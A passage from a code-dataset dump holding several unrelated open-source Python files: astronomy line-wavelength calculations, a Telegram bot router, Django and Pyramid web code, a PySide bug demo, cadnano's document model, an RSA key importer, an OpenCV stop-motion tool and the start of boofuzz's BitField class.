#C3.printIonic()
C3_1908=AIR(1/(C3.getEnergy(C3.getTransition(1908)[0])-C3.getEnergy(C3.getTransition(1908)[1])))
C4 = pn.Atom('C', 4)
#C4.printIonic()
C4_1548=AIR(1/(C4.getEnergy(C4.getTransition(1548)[0])-C4.getEnergy(C4.getTransition(1548)[1])))
O2 = pn.Atom('O', 2)
#O2.printIonic()
O2_3727=AIR(1/(O2.getEnergy(O2.getTransition(3727)[0])-O2.getEnergy(O2.getTransition(3727)[1])))
O2_3729=AIR(1/(O2.getEnergy(O2.getTransition(3729)[0])-O2.getEnergy(O2.getTransition(3729)[1])))
#O2=AIR((O2_3727+O2_3729)/2.)
O2_mean=(O2_3727*3.326568+O2_3729*3.324086)/(3.326568 + 3.324086)
Ne3 = pn.Atom('Ne',3)
#Ne3.printIonic()
Ne3_3869=AIR(1/(Ne3.getEnergy(Ne3.getTransition(3869)[0])-Ne3.getEnergy(Ne3.getTransition(3869)[1])))
Ne3_3968=AIR(1/(Ne3.getEnergy(Ne3.getTransition(3968)[0])-Ne3.getEnergy(Ne3.getTransition(3968)[1])))
O3 = pn.Atom('O', 3)
#O3.printIonic()
O3_4363=AIR(1/(O3.getEnergy(O3.getTransition(4363)[0])-O3.getEnergy(O3.getTransition(4363)[1])))
O3_4960=AIR(1/(O3.getEnergy(O3.getTransition(4960)[0])-O3.getEnergy(O3.getTransition(4960)[1])))
O3_5007=AIR(1/(O3.getEnergy(O3.getTransition(5007)[0])-O3.getEnergy(O3.getTransition(5007)[1])))
O1 = pn.Atom('O', 1)
O1_5578=AIR(1/(O1.getEnergy(O1.getTransition(5578)[0])-O1.getEnergy(O1.getTransition(5578)[1])))
O1_6302=AIR(1/(O1.getEnergy(O1.getTransition(6302)[0])-O1.getEnergy(O1.getTransition(6302)[1])))
O1_6365=AIR(1/(O1.getEnergy(O1.getTransition(6365)[0])-O1.getEnergy(O1.getTransition(6365)[1])))
N2 = pn.Atom('N', 2)
#N2.printIonic()
N2_5756=AIR(1/(N2.getEnergy(N2.getTransition(5756)[0])-N2.getEnergy(N2.getTransition(5756)[1])))
N2_6549=AIR(1/(N2.getEnergy(N2.getTransition(6549)[0])-N2.getEnergy(N2.getTransition(6549)[1])))
N2_6585=AIR(1/(N2.getEnergy(N2.getTransition(6585)[0])-N2.getEnergy(N2.getTransition(6585)[1])))
S2 = pn.Atom('S', 2)
#S2.printIonic()
S2_6718=AIR(1/(S2.getEnergy(S2.getTransition(6718)[0])-S2.getEnergy(S2.getTransition(6718)[1])))
S2_6732=AIR(1/(S2.getEnergy(S2.getTransition(6732)[0])-S2.getEnergy(S2.getTransition(6732)[1])))
Ar3 = pn.Atom('Ar', 3)
#Ar3.printIonic()
Ar3_7137=AIR(1/(Ar3.getEnergy(Ar3.getTransition(7137)[0])-Ar3.getEnergy(Ar3.getTransition(7137)[1])))
# Wavelengths from pyNeb RecAtoms are in A in Air like the SDSS spectra. Conversion needed.
H1=pn.RecAtom('H',1) # Hydrogen Balmer series
H1_3970=H1.getWave(7,2)
H1_4102=H1.getWave(6,2)
H1_4341=H1.getWave(5,2)
H1_4862=H1.getWave(4,2)
H1_6564=H1.getWave(3,2)
H1=pn.RecAtom('H',1) # Hydrogen Lyman series
H1_1216=H1.getWave(2,1)
He1=pn.RecAtom('He',1) # Helium
He2=pn.RecAtom('He',2) # Helium
He2_4686=He2.getWave(4,3)
He2_5411=He2.getWave(7,4)
# Limits for the 4000 A fit
#dl4k=150
#intLim4k=n.array([3950-dl4k, 3950, 4050, 4050+dl4k])
#intLim4k=n.array([3600-dl4k, 3600, 4140, 4140+dl4k])
# limits for th eUV luminosities fits
#intLimUV=n.array([2000,2200,3000,3200,3400,3600,4100,4300,4500,4700])
# system at 2360
# cmin1,cmax1=2080.,2240.
#em1=2326.7
#abs1=2343.7
#em2=2365.3
#aTR=2370.
#abs2=2374.3
#abs3=2382.2
#em3=2396.2
# cmin2,cmax2=2400.,2550.
#a0s2360=n.array([em1,abs1,em2,abs2,abs3,em3])
# system at 2600
#em1=2586.1
#em2=2599.6
#aTR=2606.
#abs1=2612.5
#abs2=2626.3
#cmin1,cmax1=2400.,2550.
#cmin2,cmax2=2650.,2770.
#a0s2600=n.array([em1,em2,abs1,abs2])
# system at 2800
#Mga=2795.
#Mgb=2802.
#aTR=2798.
#cmin1,cmax1=2650.,2770.
#cmin2,cmax2=2807., 2840.
#a0s2800=n.array([Mga,Mgb])
# abs2852=3851.9
# cmin2,cmax2=2870.,3000.
| cc0-1.0 | -7,262,391,922,114,196,000 | 31.141732 | 101 | 0.715091 | false | 2 | false | false | false |
JulyJ/MindBot | mindbot/router.py | 1 | 2824 | """
Module designed to route messages based on strategy pattern.
This module includes class mapper tuple to correlate received from telegram
user command with target command class to run. Additionally, this module
generates help message based on command list.
"""
from typing import Any, Dict
from .command.help.commands import GreetingsCommand, HelpCommand
from .command.nasa.apod import APODCommand
from .command.nasa.asteroid import AsteroidCommand
from .command.nasa.curiosity import CuriosityCommand
from .command.search.google import GoogleCommand
from .command.search.wiki import WikiCommand, RandomCommand
from .command.search.urban import UrbanDictionaryCommand
from .command.search.dictionary import DictionaryCommand
from .command.weather.weather import WeatherCommand
from .command.weather.forecast import ForecastCommand
from .command.exchange.exchange import ExchangeCommand
from .command.remember.rememberall import RememberAll
from .command.remember.searchtag import SearchTagCommand
from .command.comics.xkcd import XkcdCommand
from .command.tools.qrgenerator import QrCommand
from .command.tools.ocr import OcrCommand
from .command.news.hackernews import LatestNewsCommand, TopNewsCommand, BestNewsCommand
from .command.news.canadanews import CanadaStatsCommand
class CommandRouter:
command_class_mapper = (
('/help', HelpCommand),
('/asteroid', AsteroidCommand),
('/start', GreetingsCommand),
('/canadastat', CanadaStatsCommand),
('/oxford', DictionaryCommand),
('/exchange', ExchangeCommand),
('/forecast', ForecastCommand),
('/google', GoogleCommand),
('/search', SearchTagCommand),
('/urban', UrbanDictionaryCommand),
('/weather', WeatherCommand),
('/curiosity', CuriosityCommand),
('/qr', QrCommand),
('/ocr', OcrCommand),
('/apod', APODCommand),
('/wiki', WikiCommand),
('/random', RandomCommand),
('/xkcd', XkcdCommand),
('/latestnews', LatestNewsCommand),
('/topnews', TopNewsCommand),
('/bestnews', BestNewsCommand),
('/remember', RememberAll),
)
@classmethod
def route(cls, message: Dict[str, Any]):
command, _, query = message['text'].partition(' ')
command = command.lower()
if command not in dict(cls.command_class_mapper):
return
command_class = dict(cls.command_class_mapper).get(command, None)
command_instance = command_class(cls, query, message)
return command_instance()
@classmethod
def get_commands_help(cls):
return (
(command, command_class.help_text)
for command, command_class in cls.command_class_mapper
if command_class.help_text is not None
)
| mit | -6,548,554,171,890,835,000 | 37.684932 | 87 | 0.695467 | false | 4.116618 | false | false | false |
althalus/knotcrafters | knotdirectory/knotdirectory/knots/models.py | 1 | 2886 | from django.db import models
from taggit.managers import TaggableManager
from django.core.urlresolvers import reverse
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.auth import get_user_model
User = get_user_model()
class Knot(models.Model):
name = models.CharField(max_length=90, help_text="Commonly accepted name for this tie")
other_names = models.TextField(help_text="Is this knot known by other names? One name per line, please", blank=True)
creator_name = models.CharField(max_length=90, help_text="Who should we credit for discovering this tie")
creator = models.ForeignKey('CreatorProfile', blank=True, null=True, editable=False)
notes = models.TextField(help_text="Any other information? Markdown text enabled.", blank=True)
tags = TaggableManager()
date_added = models.DateTimeField(auto_now_add=True)
date_updated = models.DateTimeField(auto_now=True)
photo = models.ImageField(upload_to="knotsimages/%Y/%m/", help_text="A photo of the completed tie.")
def save(self):
if not self.creator:
try:
self.creator = CreatorProfile.objects.get(name=self.creator_name)
except CreatorProfile.DoesNotExist:
cp = CreatorProfile()
cp.name = self.creator_name
cp.save()
self.creator = cp
super(Knot, self).save()
def get_absolute_url(self):
return reverse("knots.detail", args=[self.pk, ])
def __unicode__(self):
return u'%s' % self.name
class Link(models.Model):
knot = models.ForeignKey(Knot)
link = models.URLField(help_text="Link ot the guide")
name = models.CharField(max_length=90, help_text="A descriptive name for this guide")
def __unicode__(self):
return u'Link %s on knot %s' % (self.name, self.knot.name)
class Action(models.Model):
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = generic.GenericForeignKey('content_type', 'object_id')
user = models.ForeignKey(User)
when = models.DateTimeField(auto_now=True)
what = models.TextField()
def __unicode__(self):
return u'%s: %s %s %s' % (self.when, self.user, self.what, self.content_object)
class CreatorProfile(models.Model):
name = models.CharField(max_length=90)
link_facebook_profile = models.URLField(blank=True)
link_youtube_channel = models.URLField(blank=True)
link_website = models.URLField(blank=True)
email = models.EmailField(blank=True)
user = models.ForeignKey(User, blank=True, null=True)
bio = models.TextField(blank=True, null=True)
def __unicode__(self):
return u'%s' % self.name
def get_absolute_url(self):
return reverse("creators.detail", args=[self.pk, ])
| mit | -6,894,886,796,592,600,000 | 37.48 | 120 | 0.682259 | false | 3.714286 | false | false | false |
LogikSim/LogikSimPython | src/debug/pyside_bugs/nonimplemented_virtual_methods.py | 1 | 1739 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Copyright 2014 The LogikSim Authors. All rights reserved.
Use of this source code is governed by the GNU GPL license that can
be found in the LICENSE.txt file.
Nonimplemented virtual methods can lead to event handling Problems.
Run the script as it is and you will observe the following issues:
- Frame cannot be closed kindly only by killing the process
- Resizing the Program leads to strange error messages:
QPainter::begin: Paint device returned engine == 0, type: 0
Proposed changes:
- Detect unresolvable virtual methods and print appropriate error message
Workaround for this example:
Uncomment:
def sizeHint(self, *args):
return self.rect().size()
"""
import sys
from PySide import QtGui
class TestRect(QtGui.QGraphicsRectItem, QtGui.QGraphicsLayoutItem):
def __init__(self, *args, **kargs):
QtGui.QGraphicsRectItem.__init__(self, *args, **kargs)
QtGui.QGraphicsLayoutItem.__init__(self, *args, **kargs)
self.setRect(0, 0, 200, 100)
def setGeometry(self, rect):
self.setRect(rect)
# def sizeHint(self, *args):
# return self.rect().size()
def add_rect_with_layout(scene):
item1 = TestRect()
item2 = TestRect()
scene.addItem(item1)
scene.addItem(item2)
layout = QtGui.QGraphicsGridLayout()
layout.addItem(item1, 0, 0)
layout.addItem(item2, 0, 1)
form = QtGui.QGraphicsWidget()
form.setLayout(layout)
scene.addItem(form)
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
scene = QtGui.QGraphicsScene()
add_rect_with_layout(scene)
view = QtGui.QGraphicsView()
view.setScene(scene)
view.show()
app.exec_()
| gpl-3.0 | 7,154,451,987,703,996,000 | 22.186667 | 77 | 0.677976 | false | 3.570842 | false | false | false |
JMMolenaar/cadnano2.5 | cadnano/document.py | 1 | 19668 | #!/usr/bin/env python
# encoding: utf-8
from operator import itemgetter
import cadnano.util as util
import cadnano.preferences as prefs
from cadnano.cnproxy import ProxyObject, ProxySignal
from cadnano.cnproxy import UndoStack, UndoCommand
from cadnano.strand import Strand
from cadnano.oligo import Oligo
from cadnano.strandset import StrandSet
from cadnano.virtualhelix import VirtualHelix
from cadnano.part import Part
from cadnano.part import HoneycombPart
from cadnano.part import SquarePart
from cadnano import app
class Document(ProxyObject):
"""
The Document class is the root of the model. It has two main purposes:
1. Serve as the parent all Part objects within the model.
2. Track all sub-model actions on its undoStack.
"""
def __init__(self, parent=None):
super(Document, self).__init__(parent)
self._undostack = UndoStack()
self._parts = []
self._assemblies = []
self._controller = None
self._selected_part = None
# the dictionary maintains what is selected
self._selection_dict = {}
# the added list is what was recently selected or deselected
self._selected_changed_dict = {}
app().documentWasCreatedSignal.emit(self)
# end def
### SIGNALS ###
documentPartAddedSignal = ProxySignal(object,
ProxyObject,
name='documentPartAddedSignal') # doc, part
# dict of tuples of objects using the reference as the key,
# and the value is a tuple with meta data
# in the case of strands the metadata would be which endpoints of selected
# e.g. { objectRef: (value0, value1), ...}
documentSelectedChangedSignal = ProxySignal(dict,
name='documentSelectedChangedSignal') # tuples of items + data
documentSelectionFilterChangedSignal = ProxySignal(list,
name='documentSelectionFilterChangedSignal')
documentViewResetSignal = ProxySignal(ProxyObject,
name='documentViewResetSignal')
documentClearSelectionsSignal = ProxySignal(ProxyObject,
name='documentClearSelectionsSignal')
### SLOTS ###
### ACCESSORS ###
def undoStack(self):
"""
This is the actual undoStack to use for all commands. Any children
needing to perform commands should just ask their parent for the
undoStack, and eventually the request will get here.
"""
return self._undostack
def parts(self):
"""Returns a list of parts associated with the document."""
return self._parts
def assemblies(self):
"""Returns a list of assemblies associated with the document."""
return self._assemblies
### PUBLIC METHODS FOR QUERYING THE MODEL ###
def selectedPart(self):
return self._selected_part
def addToSelection(self, obj, value):
self._selection_dict[obj] = value
self._selected_changed_dict[obj] = value
# end def
def removeFromSelection(self, obj):
if obj in self._selection_dict:
del self._selection_dict[obj]
self._selected_changed_dict[obj] = (False, False)
return True
else:
return False
# end def
def clearSelections(self):
"""
Only clear the dictionary
"""
self._selection_dict = {}
# end def
def addStrandToSelection(self, strand, value):
ss = strand.strandSet()
if ss in self._selection_dict:
self._selection_dict[ss][strand] = value
else:
self._selection_dict[ss] = {strand: value}
self._selected_changed_dict[strand] = value
# end def
def removeStrandFromSelection(self, strand):
ss = strand.strandSet()
if ss in self._selection_dict:
temp = self._selection_dict[ss]
if strand in temp:
del temp[strand]
if len(temp) == 0:
del self._selection_dict[ss]
self._selected_changed_dict[strand] = (False, False)
return True
else:
return False
else:
return False
# end def
def selectionDict(self):
return self._selection_dict
# end def
def selectedOligos(self):
"""
as long as one endpoint of a strand is in the selection, then the oligo
is considered selected
"""
s_dict = self._selection_dict
selected_oligos = set()
for ss in s_dict.keys():
for strand in ss:
selected_oligos.add(strand.oligo())
# end for
# end for
return selected_oligos if len(selected_oligos) > 0 else None
#end def
def clearAllSelected(self):
self._selection_dict = {}
# the added list is what was recently selected or deselected
self._selected_changed_dict = {}
self.documentClearSelectionsSignal.emit(self)
# end def
def isModelSelected(self, obj):
return obj in self._selection_dict
# end def
def isModelStrandSelected(self, strand):
ss = strand.strandSet()
if ss in self._selection_dict:
if strand in self._selection_dict[ss]:
return True
else:
return False
else:
return False
# end def
def getSelectedValue(self, obj):
"""
obj is an objects to look up
it is prevetted to be in the dictionary
"""
return self._selection_dict[obj]
def getSelectedStrandValue(self, strand):
"""
strand is an objects to look up
it is prevetted to be in the dictionary
"""
return self._selection_dict[strand.strandSet()][strand]
# end def
def sortedSelectedStrands(self, strandset):
# outList = self._selection_dict[strandset].keys()
# outList.sort(key=Strand.lowIdx)
out_list = [x for x in self._selection_dict[strandset].items()]
getLowIdx = lambda x: Strand.lowIdx(itemgetter(0)(x))
out_list.sort(key=getLowIdx)
return out_list
# end def
def determineStrandSetBounds(self, selected_strand_list, strandset):
min_low_delta = strandset.partMaxBaseIdx()
min_high_delta = strandset.partMaxBaseIdx() # init the return values
ss_dict = self._selection_dict[strandset]
# get the StrandSet index of the first item in the list
ss_idx = strandset._findIndexOfRangeFor(selected_strand_list[0][0])[2]
ss_list = strandset._strand_list
len_ss_list = len(ss_list)
max_ss_idx = len_ss_list - 1
i = 0
for strand, value in selected_strand_list:
while strand != ss_list[ss_idx]:
# incase there are gaps due to double xovers
ss_idx += 1
# end while
idxL, idxH = strand.idxs()
if value[0]: # the end is selected
if ss_idx > 0:
low_neighbor = ss_list[ss_idx - 1]
if low_neighbor in ss_dict:
valueN = ss_dict[low_neighbor]
# we only care if the low neighbor is not selected
temp = min_low_delta if valueN[1] \
else idxL - low_neighbor.highIdx() - 1
# end if
else: # not selected
temp = idxL - low_neighbor.highIdx() - 1
# end else
else:
temp = idxL - 0
# end else
if temp < min_low_delta:
min_low_delta = temp
# end if
# check the other end of the strand
if not value[1]:
temp = idxH - idxL - 1
if temp < min_high_delta:
min_high_delta = temp
# end if
if value[1]:
if ss_idx < max_ss_idx:
high_neighbor = ss_list[ss_idx + 1]
if high_neighbor in ss_dict:
valueN = ss_dict[high_neighbor]
# we only care if the low neighbor is not selected
temp = min_high_delta if valueN[0] \
else high_neighbor.lowIdx() - idxH - 1
# end if
else: # not selected
temp = high_neighbor.lowIdx() - idxH - 1
# end else
else:
temp = strandset.partMaxBaseIdx() - idxH
# end else
if temp < min_high_delta:
min_high_delta = temp
# end if
# check the other end of the strand
if not value[0]:
temp = idxH - idxL - 1
if temp < min_low_delta:
min_low_delta = temp
# end if
# increment counter
ss_idx += 1
# end for
return (min_low_delta, min_high_delta)
# end def
def getSelectionBounds(self):
min_low_delta = -1
min_high_delta = -1
for strandset in self._selection_dict.keys():
selected_list = self.sortedSelectedStrands(strandset)
temp_low, temp_high = self.determineStrandSetBounds(
selected_list, strandset)
if temp_low < min_low_delta or min_low_delta < 0:
min_low_delta = temp_low
if temp_high < min_high_delta or min_high_delta < 0:
min_high_delta = temp_high
# end for Mark train bus to metro
return (min_low_delta, min_high_delta)
# end def
# def operateOnStrandSelection(self, method, arg, both=False):
# pass
# # end def
def deleteSelection(self, use_undostack=True):
"""
Delete selected strands. First iterates through all selected strands
and extracts refs to xovers and strands. Next, calls removeXover
on xoverlist as part of its own macroed command for isoluation
purposes. Finally, calls removeStrand on all strands that were
fully selected (low and high), or had at least one non-xover
endpoint selected.
"""
xoList = []
strand_dict = {}
for strandset_dict in self._selection_dict.values():
for strand, selected in strandset_dict.items():
part = strand.virtualHelix().part()
idxL, idxH = strand.idxs()
strand5p = strand.connection5p()
strand3p = strand.connection3p()
# both ends are selected
strand_dict[strand] = selected[0] and selected[1]
# only look at 3' ends to handle xover deletion
sel3p = selected[0] if idxL == strand.idx3Prime() else selected[1]
if sel3p: # is idx3p selected?
if strand3p: # is there an xover
xoList.append((part, strand, strand3p, use_undostack))
else: # idx3p is a selected endpoint
strand_dict[strand] = True
else:
if not strand5p: # idx5p is a selected endpoint
strand_dict[strand] = True
if use_undostack and xoList:
self.undoStack().beginMacro("Delete xovers")
for part, strand, strand3p, useUndo in xoList:
Part.removeXover(part, strand, strand3p, useUndo)
self.removeStrandFromSelection(strand)
self.removeStrandFromSelection(strand3p)
self._selection_dict = {}
self.documentClearSelectionsSignal.emit(self)
if use_undostack:
if xoList: # end xover macro if it was started
self.undoStack().endMacro()
if True in strand_dict.values():
self.undoStack().beginMacro("Delete selection")
else:
return # nothing left to do
for strand, delete in strand_dict.items():
if delete:
strand.strandSet().removeStrand(strand)
if use_undostack:
self.undoStack().endMacro()
def paintSelection(self, scafColor, stapColor, use_undostack=True):
"""Delete xovers if present. Otherwise delete everything."""
scaf_oligos = {}
stap_oligos = {}
for strandset_dict in self._selection_dict.values():
for strand, value in strandset_dict.items():
if strand.isScaffold():
scaf_oligos[strand.oligo()] = True
else:
stap_oligos[strand.oligo()] = True
if use_undostack:
self.undoStack().beginMacro("Paint strands")
for olg in scaf_oligos.keys():
olg.applyColor(scafColor)
for olg in stap_oligos.keys():
olg.applyColor(stapColor)
if use_undostack:
self.undoStack().endMacro()
def resizeSelection(self, delta, use_undostack=True):
"""
Moves the selected idxs by delta by first iterating over all strands
to calculate new idxs (method will return if snap-to behavior would
create illegal state), then applying a resize command to each strand.
"""
resize_list = []
# calculate new idxs
for strandset_dict in self._selection_dict.values():
for strand, selected in strandset_dict.items():
part = strand.virtualHelix().part()
idxL, idxH = strand.idxs()
newL, newH = strand.idxs()
deltaL = deltaH = delta
# process xovers to get revised delta
if selected[0] and strand.connectionLow():
newL = part.xoverSnapTo(strand, idxL, delta)
if newL == None:
return
deltaH = newL-idxL
if selected[1] and strand.connectionHigh():
newH = part.xoverSnapTo(strand, idxH, delta)
if newH == None:
return
deltaL = newH-idxH
# process endpoints
if selected[0] and not strand.connectionLow():
newL = idxL + deltaL
if selected[1] and not strand.connectionHigh():
newH = idxH + deltaH
if newL > newH: # check for illegal state
return
resize_list.append((strand, newL, newH))
# end for
# end for
# execute the resize commands
if use_undostack:
self.undoStack().beginMacro("Resize Selection")
for strand, idxL, idxH in resize_list:
Strand.resize(strand, (idxL, idxH), use_undostack)
if use_undostack:
self.undoStack().endMacro()
# end def
def updateSelection(self):
"""
do it this way in the future when we have
a better signaling architecture between views
"""
# self.documentSelectedChangedSignal.emit(self._selected_changed_dict)
"""
For now, individual objects need to emit signals
"""
for obj, value in self._selected_changed_dict.items():
obj.selectedChangedSignal.emit(obj, value)
# end for
self._selected_changed_dict = {}
# for ss in self._selection_dict:
# print self.sortedSelectedStrands(ss)
# end def
def resetViews(self):
# This is a fast way to clear selections and the views.
# We could manually deselect each item from the Dict, but we'll just
# let them be garbage collect
# the dictionary maintains what is selected
self._selection_dict = {}
# the added list is what was recently selected or deselected
self._selected_changed_dict = {}
self.documentViewResetSignal.emit(self)
# end def
### PUBLIC METHODS FOR EDITING THE MODEL ###
def addHoneycombPart(self, max_row=prefs.HONEYCOMB_PART_MAXROWS,
max_col=prefs.HONEYCOMB_PART_MAXCOLS,
max_steps=prefs.HONEYCOMB_PART_MAXSTEPS):
"""
Create and store a new DNAPart and instance, and return the instance.
"""
dnapart = None
if len(self._parts) == 0:
dnapart = HoneycombPart(document=self, max_row=max_row,
max_col=max_col, max_steps=max_steps)
self._addPart(dnapart)
return dnapart
def addSquarePart(self, max_row=prefs.SQUARE_PART_MAXROWS,
max_col=prefs.SQUARE_PART_MAXCOLS,
max_steps=prefs.SQUARE_PART_MAXSTEPS):
"""
Create and store a new DNAPart and instance, and return the instance.
"""
dnapart = None
if len(self._parts) == 0:
dnapart = SquarePart(document=self, max_row=max_row,
max_col=max_col, max_steps=max_steps)
self._addPart(dnapart)
return dnapart
def removeAllParts(self):
"""Used to reset the document. Not undoable."""
self.documentClearSelectionsSignal.emit(self)
for part in self._parts:
part.remove(use_undostack=False)
# end def
def removePart(self, part):
self.documentClearSelectionsSignal.emit(self)
self._parts.remove(part)
### PUBLIC SUPPORT METHODS ###
def controller(self):
return self._controller
def setController(self, controller):
"""Called by DocumentController setDocument method."""
self._controller = controller
# end def
def setSelectedPart(self, newPart):
if self._selected_part == newPart:
return
self._selected_part = newPart
# end def
### PRIVATE SUPPORT METHODS ###
def _addPart(self, part, use_undostack=True):
"""Add part to the document via AddPartCommand."""
c = self.AddPartCommand(self, part)
util.execCommandList(
self, [c], desc="Add part", use_undostack=use_undostack)
return c.part()
# end def
### COMMANDS ###
class AddPartCommand(UndoCommand):
"""
Undo ready command for deleting a part.
"""
def __init__(self, document, part):
super(Document.AddPartCommand, self).__init__("add part")
self._doc = document
self._part = part
# end def
def part(self):
return self._part
# end def
def redo(self):
if len(self._doc._parts) == 0:
self._doc._parts.append(self._part)
self._part.setDocument(self._doc)
self._doc.setSelectedPart(self._part)
self._doc.documentPartAddedSignal.emit(self._doc, self._part)
# end def
def undo(self):
self._doc.removePart(self._part)
self._part.setDocument(None)
self._doc.setSelectedPart(None)
self._part.partRemovedSignal.emit(self._part)
# self._doc.documentPartAddedSignal.emit(self._doc, self._part)
# end def
# end class
# end class
| mit | 5,810,336,417,466,848,000 | 35.831461 | 102 | 0.552725 | false | 4.193603 | false | false | false |
CrystallineEntity/bulbs | bulbs/views/home.py | 1 | 1916 | from pyramid.view import view_config
from bulbs.components.subcategory import number_of_threads, number_of_posts, last_post
from bulbs.components import db
def catinfo(cat):
keys = "id", "title", "desc", "slug"
keys_values = zip(keys, cat)
return dict(keys_values)
def categories():
"""Return a dict containing all categories."""
cursor = db.con.cursor()
cursor.execute("SELECT id, title, description, slug FROM bulbs_category")
cats = cursor.fetchall()
data = map(catinfo, cats)
return data
def subcatinfo(data):
keys = "id", "title", "category_id", "desc", "slug"
keys_values = zip(keys, data)
id = data[0]
return dict(keys_values,
id=id,
threads=number_of_threads(id),
posts=number_of_posts(id),
last_post=last_post(id)
)
def subcategories(cat_id=None):
"""Return a dict containing information from a specified category or forums for every category."""
cursor = db.con.cursor()
if cat_id is not None:
cursor.execute(
"SELECT id, title, category_id, description, slug FROM bulbs_subcategory \
WHERE category_id = %s", (cat_id, ))
else:
cursor.execute(
"SELECT id, title, category_id, description, slug FROM bulbs_subcategory")
children = cursor.fetchall()
subcategories_ = map(subcatinfo, children)
return subcategories_
@view_config(route_name="home", renderer="home.mako")
def response(request):
cursor = db.con.cursor()
cats = categories()
subcats = list(subcategories())
cursor.execute("SELECT username FROM bulbs_user ORDER BY date DESC LIMIT 1")
newest_user = cursor.fetchone()[0]
return {
"project": request.registry.settings.get("site_name"),
"title": "Home",
"categories": cats,
"subcategories": subcats,
"new_member": newest_user
}
| mit | -4,394,526,757,759,784,400 | 32.034483 | 102 | 0.634134 | false | 3.642586 | false | false | false |
repotvsupertuga/tvsupertuga.repository | script.module.cryptolib/lib/Crypto/PublicKey/RSA.py | 1 | 2753 | #!/usr/bin/env python
from __future__ import absolute_import
import binascii
import struct
from rsa import PublicKey, PrivateKey
from Crypto.Math.Numbers import Integer
def import_key(extern_key, passphrase=None):
"""Import an RSA key (public or private half), encoded in standard
form.
:Parameter extern_key:
The RSA key to import, encoded as a byte string.
An RSA public key can be in any of the following formats:
- X.509 certificate (binary or PEM format)
- X.509 ``subjectPublicKeyInfo`` DER SEQUENCE (binary or PEM
encoding)
- `PKCS#1`_ ``RSAPublicKey`` DER SEQUENCE (binary or PEM encoding)
- OpenSSH (textual public key only)
An RSA private key can be in any of the following formats:
- PKCS#1 ``RSAPrivateKey`` DER SEQUENCE (binary or PEM encoding)
- `PKCS#8`_ ``PrivateKeyInfo`` or ``EncryptedPrivateKeyInfo``
DER SEQUENCE (binary or PEM encoding)
- OpenSSH (textual public key only)
For details about the PEM encoding, see `RFC1421`_/`RFC1423`_.
The private key may be encrypted by means of a certain pass phrase
either at the PEM level or at the PKCS#8 level.
:Type extern_key: string
:Parameter passphrase:
In case of an encrypted private key, this is the pass phrase from
which the decryption key is derived.
:Type passphrase: string
:Return: An RSA key object (`RsaKey`).
:Raise ValueError/IndexError/TypeError:
When the given key cannot be parsed (possibly because the pass
phrase is wrong).
.. _RFC1421: http://www.ietf.org/rfc/rfc1421.txt
.. _RFC1423: http://www.ietf.org/rfc/rfc1423.txt
.. _`PKCS#1`: http://www.ietf.org/rfc/rfc3447.txt
.. _`PKCS#8`: http://www.ietf.org/rfc/rfc5208.txt
"""
if passphrase is not None:
raise ValueError("RSA key passphrase is not supported")
if extern_key.startswith('ssh-rsa '):
# This is probably an OpenSSH key
keystring = binascii.a2b_base64(extern_key.split(' ')[1])
keyparts = []
while len(keystring) > 4:
l = struct.unpack(">I", keystring[:4])[0]
keyparts.append(keystring[4:4 + l])
keystring = keystring[4 + l:]
e = Integer.from_bytes(keyparts[1])
n = Integer.from_bytes(keyparts[2])
return PublicKey(n._value, e._value)
for fmt in ("PEM", "DER"):
try:
return PrivateKey.load_pkcs1(extern_key, fmt)
except:
try:
return PublicKey.load_pkcs1(extern_key, fmt)
except:
pass
raise ValueError("RSA key format is not supported")
# Backward compatibility
importKey = import_key
| gpl-2.0 | 2,940,562,159,866,837,000 | 33.848101 | 74 | 0.631311 | false | 3.882934 | false | false | false |
fatcloud/PyCV-time | experiments/stop_motion_tool/stop_motion_tool.py | 1 | 1533 | from cam import OpenCV_Cam
import cv2
import os.path
import time
cam = OpenCV_Cam(0)
cam.size = (1920, 1080)
KEY_ESC = 27
KEY_SPACE = ord(' ')
PAGE_DOWN = 2228224 # This make the stop motion to be controllable by presenter.
prevFrame = None
i = 0
#Make a directory on current working directory with date and time as its name
timestr = time.strftime("%Y%m%d-%H%M%S")
cwd = os.getcwd()
dirName = cwd + "\\"+timestr
os.makedirs(dirName)
fname= cwd + "\\frame_.png"
if os.path.isfile(fname):
prevFrame = cv2.imread(fname)
#Make .avi file from collected frames
fourcc = cv2.cv.CV_FOURCC(*'XVID')
video = cv2.VideoWriter(dirName+"\\"+'output_.avi',fourcc, 3.0, cam.size, isColor =True)
while True:
# Capture frame-by-frame
frame = cam.read()
# image processing functions
# Load the frame into a window named as 'Press any key to exit'
if (prevFrame is not None):
showFrame = cv2.addWeighted(frame,0.7,prevFrame,0.3,0)
else:
showFrame = frame
resizeShowFrame = cv2.resize(showFrame, (0,0), fx = 0.5, fy = 0.5 )
cv2.imshow('Press ESC to exit', resizeShowFrame)
# wait for the key
key_code = cv2.waitKey(10)
if key_code is KEY_SPACE or key_code == PAGE_DOWN:
cv2.imwrite(dirName+"\\"+'frame'+str(i)+'_.png', frame)
video.write(frame)
prevFrame = frame
i += 1
elif key_code is KEY_ESC:
cv2.imwrite(cwd + '\\frame_.png', prevFrame)
break
cv2.destroyAllWindows()
cam.release()
video.release()
| mit | 5,548,077,770,134,502,000 | 24.131148 | 88 | 0.641879 | false | 3 | false | false | false |
jtpereyda/boofuzz | boofuzz/primitives/bit_field.py | 1 | 6982 | import struct
from builtins import range
import six
from past.builtins import map
from .. import helpers
from ..constants import LITTLE_ENDIAN
from ..fuzzable import Fuzzable
def binary_string_to_int(binary):
"""
Convert a binary string to a decimal number.
@type binary: str
@param binary: Binary string
@rtype: int
@return: Converted bit string
"""
return int(binary, 2)
def int_to_binary_string(number, bit_width):
"""
Convert a number to a binary string.
@type number: int
@param number: (Optional, def=self._value) Number to convert
@type bit_width: int
@param bit_width: (Optional, def=self.width) Width of bit string
@rtype: str
@return: Bit string
"""
return "".join(map(lambda x: str((number >> x) & 1), range(bit_width - 1, -1, -1)))
class BitField(Fuzzable):
"""
The bit field primitive represents a number of variable length and is used to define all other integer types.
:type name: str, optional
:param name: Name, for referencing later. Names should always be provided, but if not, a default name will be given,
defaults to None
:type default_value: int, optional
:param default_value: Default integer value, defaults to 0
:type width: int, optional
:param width: Width in bits, defaults to 8
:type max_num: int, optional
:param max_num: Maximum number to iterate up to, defaults to None
:type endian: char, optional
:param endian: Endianness of the bit field (LITTLE_ENDIAN: <, BIG_ENDIAN: >), defaults to LITTLE_ENDIAN
:type output_format: str, optional
